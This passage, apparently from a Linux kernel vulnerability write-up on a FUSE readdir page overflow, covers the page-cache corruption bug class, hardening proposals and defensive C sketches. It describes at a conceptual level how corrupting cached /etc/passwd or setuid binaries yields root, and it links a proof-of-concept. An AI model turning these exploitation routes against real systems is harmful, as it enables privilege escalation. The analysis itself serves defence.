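With the check in place the invariant offset ≤ page size holds after every call, whatever sequence of record sizes the daemon sends: a 4120-byte record is dropped and leaves the position unchanged, while a record of exactly one page still gets a fresh page to itself.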

Stopping the class, not just the bug

Page-cache corruption is not a bug. It is a bug class, and at this point it is a prolific one. Numerous kernel vulnerabilities have been turned into root by silently rewriting cached file contents, and the routes have almost nothing in common except the destination.

DirtyCOW (CVE-2016-5195) exploited a race in the copy-on-write fault handler. DirtyPipe (CVE-2022-0847) exploited a stale PIPE_BUF_FLAG_CAN_MERGE flag in the pipe subsystem. Copy Fail (CVE-2026-31431) exploited an in-place optimisation in algif_aead to write four controlled bytes into any readable file’s page cache via AF_ALG and splice. The DirtyFrag family (CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-43503) found path after path through the networking stack where skb cloning and coalescing dropped the SKBFL_SHARED_FRAG safety flag, letting IPsec in-place decryption overwrite file-backed pages. The pedit COW bug (CVE-2026-46331) achieved the same result through traffic control. And this FUSE readdir overflow takes yet another route: a memcpy that runs off the end of a page-allocator page into an adjacent page-cache page in the direct map. Different subsystems, different bug classes, same end state: the in-memory copy of a security-critical file says something different from what is on disk, and the kernel trusts the cached version.

Each bug was fixed individually, and correctly. But fixing each new route one at a time is whack-a-mole. The routes are unbounded; the destination is not.

There is a targeted hardening that would close part of this. The config files that grant root when corrupted are a small, stable set: /etc/passwd, /etc/shadow, /etc/sudoers, the handful of files under /etc/pam.d/. They rarely change after provisioning. If the kernel made the direct-map alias of their page-cache pages read-only at the page-table level, every corruption attempt through the direct map would fault rather than silently succeed. A memcpy overflow, a pipe merge, a COW race, any future variant hitting those pages would take a page fault instead of rewriting the file. Handle that fault as a panic and you turn the LPE into a denial of service. A panic is better than a root shell.

The cost would be low for this narrow set. Legitimate writes to these files are infrequent (useradd, passwd), and those write paths could go through a dedicated writable alias without meaningful overhead. You would split a few huge pages in the direct map to mark individual 4K pages read-only, but the TLB cost is trivial when you are protecting a dozen files rather than an entire filesystem.
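
The behaviour this hardening relies on can be shown with a userspace analogy. This is only a sketch: it uses mmap and mprotect on an anonymous page in place of the kernel's direct-map page tables, and the function name write_to_readonly_page_faults is hypothetical. What it demonstrates is the property the proposal depends on, namely that a stray write to a read-only mapping traps and leaves the contents intact instead of silently succeeding.

```c
#define _DEFAULT_SOURCE          /* MAP_ANONYMOUS on glibc in strict modes */
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf fault_jmp;

/* Fault handler: unwind back to the sigsetjmp() call below. */
static void on_fault(int sig)
{
    (void)sig;
    siglongjmp(fault_jmp, 1);
}

/*
 * Userspace stand-in for a read-only page-cache alias (an analogy, not
 * kernel code). Returns 1 if the stray write faulted and the page kept
 * its contents, 0 if the write landed, -1 if setup failed.
 */
static int write_to_readonly_page_faults(void)
{
    long psz = sysconf(_SC_PAGESIZE);
    if (psz <= 0)
        return -1;

    char *page = mmap(NULL, (size_t)psz, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;

    /* Fill the page with "trusted" contents, then drop write permission. */
    strcpy(page, "root:x:0:0:root:/root:/bin/sh\n");
    if (mprotect(page, (size_t)psz, PROT_READ) != 0) {
        munmap(page, (size_t)psz);
        return -1;
    }

    /* Some systems report the violation as SIGBUS, so catch both. */
    struct sigaction sa, old_segv, old_bus;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    volatile int faulted = 0;
    if (sigsetjmp(fault_jmp, 1) == 0)
        ((volatile char *)page)[0] = 'X';   /* the stray write */
    else
        faulted = 1;                        /* arrived here via the handler */

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);

    int intact = (page[0] == 'r');          /* contents must be unchanged */
    munmap(page, (size_t)psz);
    return (faulted && intact) ? 1 : 0;
}
```

In the kernel the equivalent fault would be taken in kernel mode on the direct-map address, which is where the panic-versus-root-shell trade-off described above comes in.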

But this only closes the config-file vector. Copy Fail and the DirtyFrag family do not touch /etc/passwd at all. They corrupt the cached code of a setuid binary like /usr/bin/su, modifying the executable in memory so it runs attacker-controlled instructions the next time it is invoked. If config files are protected but setuid binaries are not, the attacker just takes the binary-corruption path instead. You have forced a pivot, not closed a door.

Closing the binary-corruption vector is harder. The set of “files that grant root if corrupted” expands from a dozen config files to every setuid binary, every shared library loaded by a privileged process, every PAM module, every polkit rule. At that scale you are no longer marking a few pages read-only; you are making the entire rootfs immutable, which is a different operating model. It already exists: Android and ChromeOS do it with dm-verity, Fedora Silverblue and NixOS keep their system trees read-only (the ostree-managed /usr and /nix/store respectively), and the page-cache corruption bug class is one more argument in their favour. Short of that, IMA (Integrity Measurement Architecture) appraisal on exec can check binary integrity before running a setuid program, but it has its own costs (signing infrastructure, performance on first exec, policy maintenance) and it verifies the on-disk state rather than the in-memory state, so a page-cache-only corruption could still slip past depending on when the appraisal runs relative to the cache poisoning.

So the honest framing is: protecting config-file page-cache pages is a cheap, targeted hardening that would have stopped this FUSE exploit and DirtyPipe and any future variant that targets /etc/passwd. It would not have stopped Copy Fail or DirtyFrag. Stopping those needs either immutable rootfs or runtime integrity checking of cached executables, both of which exist but require a different OS model than most Linux distributions ship today. The page-cache corruption class will keep producing new routes until the kernel stops trusting cached contents unconditionally, and how far you go with that depends on how much of your filesystem you are willing to treat as untrusted memory.

A broader pattern

The shape of this bug is a length that crosses a trust boundary and is checked against the wrong thing. namelen comes from the FUSE daemon, which is untrusted even though it is “local”, and the size derived from it, reclen, is validated against the cursor (offset + reclen > PAGE_SIZE) but never against the capacity (reclen > PAGE_SIZE). A bounds check that compares a peer-controlled size to “how much room is left” silently assumes the size can never exceed the whole container. The moment that assumption is false, advancing to a fresh container does not save you. It just gives the oversized record a clean page to run off the end of.
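
The difference between the two checks is easy to see in a small userspace model. This is a sketch, not the kernel code: the MODEL_ constants and function names are hypothetical, and it assumes 4 KiB pages, a 24-byte dirent header and 8-byte record alignment, which is what the 4095 to 4120 arithmetic above implies.

```c
#include <stdbool.h>
#include <stddef.h>

/* Model constants, not kernel headers: 4 KiB pages, 24-byte dirent header. */
#define MODEL_PAGE_SIZE   4096u
#define MODEL_NAME_OFFSET 24u

/* Record length: header plus name, rounded up to an 8-byte boundary. */
static size_t model_reclen(size_t namelen)
{
    return (MODEL_NAME_OFFSET + namelen + 7u) & ~(size_t)7;
}

/*
 * Cursor-only check. If the record does not fit in the space left on the
 * current page, start a fresh page, then copy. Returns how many bytes of
 * the copy land past the end of the page.
 */
static size_t spill_cursor_only(size_t offset, size_t reclen)
{
    if (offset + reclen > MODEL_PAGE_SIZE)
        offset = 0;                      /* fresh page, cursor reset */
    size_t end = offset + reclen;        /* where the copy would stop */
    return end > MODEL_PAGE_SIZE ? end - MODEL_PAGE_SIZE : 0;
}

/* Capacity check: a record larger than a whole page is refused outright. */
static bool fits_in_any_page(size_t reclen)
{
    return reclen <= MODEL_PAGE_SIZE;
}
```

With namelen = 4095 the model gives a 4120-byte record. spill_cursor_only() reports 24 bytes past the page regardless of the starting offset, while fits_in_any_page() rejects the record before any copy happens.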

The reachability story generalises into the more useful lesson. A check that is correct only because of a limit defined elsewhere is load-bearing on that limit, and nothing records the dependency. When FUSE_NAME_MAX was 1024, the missing reclen > PAGE_SIZE guard was invisible; raising the limit for an unrelated reason, in a different file, about seven years later, turned it into a page overflow without a single line of readdir.c changing. So the thing to grep for is not the overflow but the latent precondition: a fixed-capacity buffer that takes a size from an untrusted producer and checks it against a running offset rather than the capacity. One step out, look for any constant that silently bounds such a check, because the day someone raises it is the day every place that leaned on the old value becomes attack surface.
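
One way to record that kind of dependency is a compile-time assertion placed next to the code that leans on the limit. The sketch below is illustrative only and is not what the upstream fix does (the fix is the runtime reclen check). All MODEL_ names are hypothetical, with the values taken from the numbers in this write-up.

```c
#include <assert.h>   /* static_assert (C11) */
#include <stddef.h>

/* Model values from this write-up, not kernel headers. */
#define MODEL_PAGE_SIZE    4096u
#define MODEL_NAME_OFFSET  24u
#define MODEL_OLD_NAME_MAX 1024u   /* the limit the cursor check leaned on */
#define MODEL_NEW_NAME_MAX 4095u   /* the raised limit */

/* Header plus name, rounded up to 8 bytes. */
#define MODEL_RECLEN(namelen) \
    (((size_t)MODEL_NAME_OFFSET + (namelen) + 7u) & ~(size_t)7)

/*
 * The cursor-only check is safe only while the largest possible record
 * fits in one page. Stating that here makes the build fail if someone
 * raises the name limit past what a page can hold.
 */
static_assert(MODEL_RECLEN(MODEL_OLD_NAME_MAX) <= MODEL_PAGE_SIZE,
              "largest dirent record must fit in a single page");

/*
 * The same assertion with MODEL_NEW_NAME_MAX would not compile:
 * MODEL_RECLEN(4095) is 4120, which exceeds 4096.
 */

/* Runtime helper so the arithmetic can be inspected. */
static size_t model_max_reclen(size_t name_max)
{
    return MODEL_RECLEN(name_max);
}
```

The assertion does nothing at runtime. Its value is that the person raising the constant gets a build failure pointing at the buffer that depended on the old value, rather than finding out from a CVE.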


Credit where it is due: to Qi Tang and Zijun Hu for reporting the bug, to Samuel Page for writing the fix, and to Bernd Schubert and the FUSE maintainers for the work this analysis picks apart. CVE-2026-31694 is closed by the reclen check in mainline and across the stable trees. As ever with a peer-controlled-length bug, the only complete answer is to stop trusting the length. Proof of concept: github.com/0xCyberstan/CVE-2026-31694-POC.